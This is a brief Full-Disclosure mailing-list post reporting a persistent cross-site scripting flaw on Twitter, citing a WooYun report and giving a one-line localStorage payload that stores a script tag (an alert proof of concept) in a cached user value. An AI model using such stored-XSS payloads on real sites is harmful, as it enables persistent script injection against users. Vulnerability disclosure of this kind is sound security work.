[Full-disclosure] A persistent xss on twitter,another xss rootkit



Hi

someone report a persistent xss about twitter on wooyun

http://www.wooyun.org/bugs/wooyun-2010-03075

just put on some magic code like this

localStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}');

:)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/